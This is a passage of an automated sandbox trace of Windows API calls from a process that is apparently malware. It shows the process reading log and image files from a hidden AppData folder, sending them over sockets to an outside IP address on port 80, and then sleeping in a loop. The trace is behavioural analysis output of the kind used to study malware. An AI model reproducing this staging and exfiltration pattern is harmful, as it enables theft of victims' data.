setsockopt (s=0x24ac, level=65535, optname=4102, optval="ô\x01", optlen=4) returned 0 [0283.972] recv (in: s=0x24ac, buf=0x107df040, len=2048000, flags=0 | out: buf=0x107df040*) returned 753 [0284.041] closesocket (s=0x24ac) returned 0 [0284.041] Sleep (dwMilliseconds=0x7d0) [0284.043] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlog00.ini", NtPathName=0x10b3fb20, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlog00.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0284.043] NtCreateFile (in: FileHandle=0x10b3fac0, DesiredAccess=0x120089, ObjectAttributes=0x10b3fb30*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlog00.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlog00.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fad0, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fac0*=0xffffffffffffffff, IoStatusBlock=0x10b3fad0*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc0000034 [0284.043] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa40 | out: HeapArray=0x10b3fa40*=0x4b0000) returned 0x6 [0284.043] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892b610) returned 1 [0284.043] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogri.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogri.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0284.043] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogri.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogri.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0x24ac, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0284.043] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0284.044] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892b3d0) returned 1 [0284.044] NtQueryInformationFile (in: FileHandle=0x24ac, IoStatusBlock=0x10b3fa90, FileInformation=0x10b3faa0, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x10b3fa90, FileInformation=0x10b3faa0) returned 0x0 [0284.044] NtReadFile (in: FileHandle=0x24ac, Event=0x0, UserApcRoutine=0x0, UserApcContext=0x0, IoStatusBlock=0x10b3fa90, Buffer=0xa0f488a, BufferLength=0x28, ByteOffset=0x10b3fa88*=0, Key=0x0 | out: IoStatusBlock=0x10b3fa90, Buffer=0xa0f488a*) returned 0x0 [0284.044] NtClose (Handle=0x24ac) returned 0x0 [0284.044] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrf.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrf.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0284.044] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrf.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrf.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc0000034 [0284.044] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0284.044] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892aad0) returned 1 [0284.044] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrt.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrt.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0284.044] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrt.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrt.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc0000034 [0284.044] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0284.044] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892abf0) returned 1 [0284.044] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrg.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrg.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0284.044] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrg.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrg.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc0000034 [0284.045] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0284.045] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892b3d0) returned 1 [0284.045] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0284.045] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrc.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0x24ac, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0284.045] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0284.045] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892aad0) returned 1 [0284.045] NtQueryInformationFile (in: FileHandle=0x24ac, IoStatusBlock=0x10b3fa90, FileInformation=0x10b3faa0, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x10b3fa90, FileInformation=0x10b3faa0) returned 0x0 [0284.045] NtReadFile (in: FileHandle=0x24ac, Event=0x0, UserApcRoutine=0x0, UserApcContext=0x0, IoStatusBlock=0x10b3fa90, Buffer=0xa0f488a, BufferLength=0x6fe, ByteOffset=0x10b3fa88*=0, Key=0x0 | out: IoStatusBlock=0x10b3fa90, Buffer=0xa0f488a*) returned 0x0 [0284.045] NtClose (Handle=0x24ac) returned 0x0 [0284.054] socket (af=2, type=1, protocol=6) returned 0x24ac [0284.054] connect (s=0x24ac, name=0x8883900*(sa_family=2, sin_port=0x50, sin_addr="104.21.21.144"), namelen=16) returned 0 [0284.077] RtlIntegerToChar (in: Value=0xc9d, Base=0x0, Length=0x8, String=0x10b3fae8 | out: String="3229") returned 0x0 [0284.077] send (s=0x24ac, buf=0xa0f8c8a*, len=3620, flags=0) returned 3620 [0284.078] closesocket (s=0x24ac) returned 0 [0284.079] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrm.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrm.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0284.079] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrm.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrm.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc0000034 [0284.079] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0284.079] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892aad0) returned 1 [0284.079] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrv.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrv.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0284.079] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrv.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrv.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0x24ac, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0284.079] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0284.079] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892aad0) returned 1 [0284.080] NtQueryInformationFile (in: FileHandle=0x24ac, IoStatusBlock=0x10b3fa90, FileInformation=0x10b3faa0, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x10b3fa90, FileInformation=0x10b3faa0) returned 0x0 [0284.080] NtReadFile (in: FileHandle=0x24ac, Event=0x0, UserApcRoutine=0x0, UserApcContext=0x0, IoStatusBlock=0x10b3fa90, Buffer=0xa0f488a, BufferLength=0x28, ByteOffset=0x10b3fa88*=0, Key=0x0 | out: IoStatusBlock=0x10b3fa90, Buffer=0xa0f488a*) returned 0x0 [0284.080] NtClose (Handle=0x24ac) returned 0x0 [0284.080] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogro.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogro.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0284.080] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogro.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogro.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc0000034 [0284.080] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0284.080] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892b3d0) returned 1 [0284.080] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogcl.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogcl.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0284.080] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogcl.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogcl.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc0000034 [0284.080] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0284.080] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892b610) returned 1 [0284.080] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogim.jpeg", NtPathName=0x10b3fab0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogim.jpeg", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0284.080] NtCreateFile (in: FileHandle=0x10b3fa50, DesiredAccess=0x120089, ObjectAttributes=0x10b3fac0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogim.jpeg" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogim.jpeg"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa60, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa50*=0x24ac, IoStatusBlock=0x10b3fa60*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0284.081] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3f9d0 | out: HeapArray=0x10b3f9d0*=0x4b0000) returned 0x6 [0284.081] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892b3d0) returned 1 [0284.081] NtQueryInformationFile (in: FileHandle=0x24ac, IoStatusBlock=0x10b3fa60, FileInformation=0x10b3fa70, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x10b3fa60, FileInformation=0x10b3fa70) returned 0x0 [0284.081] NtReadFile (in: FileHandle=0x24ac, Event=0x0, UserApcRoutine=0x0, UserApcContext=0x0, IoStatusBlock=0x10b3fa60, Buffer=0x103e984d, BufferLength=0x16987, ByteOffset=0x10b3fa58*=0, Key=0x0 | out: IoStatusBlock=0x10b3fa60, Buffer=0x103e984d*) returned 0x0 [0284.081] NtClose (Handle=0x24ac) returned 0x0 [0284.081] socket (af=2, type=1, protocol=6) returned 0x24ac [0284.081] connect (s=0x24ac, name=0x8883900*(sa_family=2, sin_port=0x50, sin_addr="104.21.21.144"), namelen=16) returned 0 [0284.108] RtlIntegerToChar (in: Value=0x282fd, Base=0x0, Length=0x8, String=0x10b3fab8 | out: String="164605") returned 0x0 [0284.109] send (s=0x24ac, buf=0x10469840*, len=164998, flags=0) returned 164998 [0284.111] closesocket (s=0x24ac) returned 0 [0284.111] Sleep (dwMilliseconds=0x7d0) [0284.113] Sleep (dwMilliseconds=0x7d0) [0284.115] Sleep (dwMilliseconds=0x7d0) [0284.116] Sleep (dwMilliseconds=0x7d0) [0284.118] Sleep (dwMilliseconds=0x7d0) [0284.119] Sleep (dwMilliseconds=0x7d0) [0284.121] Sleep (dwMilliseconds=0x7d0) [0284.123] Sleep (dwMilliseconds=0x7d0) [0284.124] Sleep (dwMilliseconds=0x7d0) [0284.126] Sleep (dwMilliseconds=0x7d0) [0284.127] Sleep (dwMilliseconds=0x7d0) [0284.129] Sleep (dwMilliseconds=0x7d0) [0284.130] Sleep (dwMilliseconds=0x7d0) [0284.132] Sleep (dwMilliseconds=0x7d0) [0284.133] Sleep (dwMilliseconds=0x7d0) [0284.135] Sleep (dwMilliseconds=0x7d0) [0284.136] Sleep (dwMilliseconds=0x7d0) [0284.138] Sleep (dwMilliseconds=0x7d0) [0284.139] Sleep (dwMilliseconds=0x7d0) [0284.141] Sleep (dwMilliseconds=0x7d0) [0284.142] Sleep (dwMilliseconds=0x7d0) [0284.144] Sleep (dwMilliseconds=0x7d0) [0284.145] Sleep (dwMilliseconds=0x7d0) [0284.147] Sleep (dwMilliseconds=0x7d0) [0284.148] Sleep (dwMilliseconds=0x7d0) [0284.150] Sleep (dwMilliseconds=0x7d0) [0284.151] Sleep (dwMilliseconds=0x7d0) [0284.153] Sleep (dwMilliseconds=0x7d0) [0284.154] Sleep (dwMilliseconds=0x7d0) [0284.156] Sleep (dwMilliseconds=0x7d0) [0284.157] Sleep (dwMilliseconds=0x7d0) [0284.159] Sleep (dwMilliseconds=0x7d0) [0284.160] Sleep (dwMilliseconds=0x7d0) [0284.162] Sleep (dwMilliseconds=0x7d0) [0284.163] Sleep (dwMilliseconds=0x7d0) [0284.165] Sleep (dwMilliseconds=0x7d0) [0284.166] Sleep (dwMilliseconds=0x7d0) [0284.168] Sleep (dwMilliseconds=0x7d0) [0284.169] Sleep (dwMilliseconds=0x7d0) [0284.171] Sleep (dwMilliseconds=0x7d0) [0284.172] Sleep (dwMilliseconds=0x7d0) [0284.174] Sleep (dwMilliseconds=0x7d0) [0284.175] Sleep (dwMilliseconds=0x7d0) [0284.177] Sleep (dwMilliseconds=0x7d0) [0284.178] Sleep (dwMilliseconds=0x7d0) [0284.180] Sleep (dwMilliseconds=0x7d0) [0284.181] Sleep (dwMilliseconds=0x7d0) [0284.183] Sleep (dwMilliseconds=0x7d0) [0284.184] Sleep (dwMilliseconds=0x7d0) [0284.186] Sleep (dwMilliseconds=0x7d0) [0284.187] Sleep (dwMilliseconds=0x7d0) [0284.189] Sleep (dwMilliseconds=0x7d0) [0284.190] Sleep (dwMilliseconds=0x7d0) [0284.194] Sleep (dwMilliseconds=0x7d0) [0284.195] Sleep (dwMilliseconds=0x7d0) [0284.197] Sleep (dwMilliseconds=0x7d0) [0284.198] Sleep (dwMilliseconds=0x7d0) [0284.200] Sleep (dwMilliseconds=0x7d0) [0284.201] Sleep (dwMilliseconds=0x7d0) [0284.203] Sleep (dwMilliseconds=0x7d0) [0284.204] Sleep (dwMilliseconds=0x7d0) [0284.206] Sleep (dwMilliseconds=0x7d0) [0284.207] Sleep (dwMilliseconds=0x7d0) [0284.209] Sleep (dwMilliseconds=0x7d0) [0284.210] Sleep (dwMilliseconds=0x7d0) [0284.212] Sleep (dwMilliseconds=0x7d0) [0284.213] Sleep (dwMilliseconds=0x7d0) [0284.215] Sleep (dwMilliseconds=0x7d0) [0284.216] Sleep (dwMilliseconds=0x7d0) [0284.218] Sleep (dwMilliseconds=0x7d0) [0284.219] Sleep (dwMilliseconds=0x7d0) [0284.221] Sleep (dwMilliseconds=0x7d0) [0284.222] Sleep (dwMilliseconds=0x7d0) [0284.224] Sleep (dwMilliseconds=0x7d0) [0284.225] Sleep (dwMilliseconds=0x7d0) [0284.227] Sleep (dwMilliseconds=0x7d0) [0284.228] Sleep (dwMilliseconds=0x7d0) [0284.230] Sleep (dwMilliseconds=0x7d0) [0284.231] Sleep (dwMilliseconds=0x7d0) [0284.233] Sleep (dwMilliseconds=0x7d0) [0284.234] Sleep (dwMilliseconds=0x7d0) [0284.236] Sleep (dwMilliseconds=0x7d0) [0284.237] Sleep (dwMilliseconds=0x7d0) [0284.239] Sleep (dwMilliseconds=0x7d0) [0284.240] Sleep (dwMilliseconds=0x7d0) [0284.242] Sleep (dwMilliseconds=0x7d0) [0284.243] Sleep (dwMilliseconds=0x7d0) [0284.245] Sleep (dwMilliseconds=0x7d0) [0284.246] Sleep (dwMilliseconds=0x7d0) [0284.248] Sleep (dwMilliseconds=0x7d0) [0284.249] Sleep (dwMilliseconds=0x7d0) [0284.251] Sleep (dwMilliseconds=0x7d0) [0284.252] Sleep (dwMilliseconds=0x7d0) [0284.254] Sleep (dwMilliseconds=0x7d0) [0284.255] Sleep (dwMilliseconds=0x7d0) [0284.257] Sleep (dwMilliseconds=0x7d0) [0284.258] Sleep (dwMilliseconds=0x7d0) [0284.260] Sleep (dwMilliseconds=0x7d0) [0284.261] Sleep (dwMilliseconds=0x7d0) [0284.263] Sleep (dwMilliseconds=0x7d0) [0284.264] Sleep (dwMilliseconds=0x7d0) [0284.266] Sleep (dwMilliseconds=0x7d0) [0284.267] Sleep (dwMilliseconds=0x7d0) [0284.269] Sleep (dwMilliseconds=0x7d0) [0284.270] Sleep (dwMilliseconds=0x7d0) [0284.272] Sleep (dwMilliseconds=0x7d0) [0284.273] Sleep (dwMilliseconds=0x7d0) [0284.275] Sleep (dwMilliseconds=0x7d0) [0284.276] Sleep (dwMilliseconds=0x7d0) [0284.278] Sleep (dwMilliseconds=0x7d0) [0284.279] Sleep (dwMilliseconds=0x7d0) [0284.281] Sleep (dwMilliseconds=0x7d0) [0284.282] Sleep (dwMilliseconds=0x7d0) [0284.284] Sleep (dwMilliseconds=0x7d0) [0284.285] Sleep (dwMilliseconds=0x7d0) [0284.287] Sleep (dwMilliseconds=0x7d0) [0284.288] Sleep (dwMilliseconds=0x7d0) [0284.290] Sleep (dwMilliseconds=0x7d0) [0284.291] Sleep (dwMilliseconds=0x7d0) [0284.293] Sleep (dwMilliseconds=0x7d0) [0284.295] Sleep (dwMilliseconds=0x7d0) [0284.296] Sleep (dwMilliseconds=0x7d0) [0284.298] Sleep (dwMilliseconds=0x7d0) [0284.299] Sleep (dwMilliseconds=0x7d0) [0284.301] Sleep (dwMilliseconds=0x7d0) [0284.302] Sleep (dwMilliseconds=0x7d0) [0284.304] Sleep (dwMilliseconds=0x7d0) [0284.305] Sleep (dwMilliseconds=0x7d0) [0284.307] Sleep (dwMilliseconds=0x7d0) [0284.308] Sleep (dwMilliseconds=0x7d0) [0284.310] Sleep (dwMilliseconds=0x7d0) [0284.311] Sleep (dwMilliseconds=0x7d0) [0284.313] Sleep (dwMilliseconds=0x7d0) [0284.314] Sleep (dwMilliseconds=0x7d0) [0284.316] Sleep (dwMilliseconds=0x7d0) [0284.317] Sleep (dwMilliseconds=0x7d0) [0284.319] Sleep (dwMilliseconds=0x7d0) [0284.320] Sleep (dwMilliseconds=0x7d0) [0284.322] Sleep (dwMilliseconds=0x7d0) [0284.323] Sleep (dwMilliseconds=0x7d0) [0284.325] Sleep (dwMilliseconds=0x7d0) [0284.326] Sleep (dwMilliseconds=0x7d0) [0284.328] Sleep (dwMilliseconds=0x7d0) [0284.329] Sleep (dwMilliseconds=0x7d0) [0284.331] Sleep (dwMilliseconds=0x7d0) [0284.332] Sleep (dwMilliseconds=0x7d0) [0284.334] Sleep (dwMilliseconds=0x7d0) [0284.335] Sleep (dwMilliseconds=0x7d0) [0284.337] Sleep (dwMilliseconds=0x7d0) [0284.338] Sleep (dwMilliseconds=0x7d0) [0284.340] Sleep (dwMilliseconds=0x7d0) [0284.341] Sleep (dwMilliseconds=0x7d0) [0284.343] Sleep (dwMilliseconds=0x7d0) [0284.344] Sleep (dwMilliseconds=0x7d0) [0284.346] Sleep (dwMilliseconds=0x7d0) [0284.347] Sleep (dwMilliseconds=0x7d0) [0284.349] Sleep (dwMilliseconds=0x7d0) [0284.350] Sleep (dwMilliseconds=0x7d0) [0284.352] Sleep (dwMilliseconds=0x7d0) [0284.353] Sleep (dwMilliseconds=0x7d0) [0284.355] Sleep (dwMilliseconds=0x7d0) [0284.356] Sleep (dwMilliseconds=0x7d0) [0284.358] Sleep (dwMilliseconds=0x7d0) [0284.359] Sleep (dwMilliseconds=0x7d0) [0284.361] Sleep (dwMilliseconds=0x7d0) [0284.362] Sleep (dwMilliseconds=0x7d0) [0284.364] Sleep (dwMilliseconds=0x7d0) [0284.365] Sleep (dwMilliseconds=0x7d0) [0284.367] Sleep (dwMilliseconds=0x7d0) [0284.368] Sleep (dwMilliseconds=0x7d0) [0284.370] Sleep (dwMilliseconds=0x7d0) [0284.371] Sleep (dwMilliseconds=0x7d0) [0284.373] Sleep (dwMilliseconds=0x7d0) [0284.374] Sleep 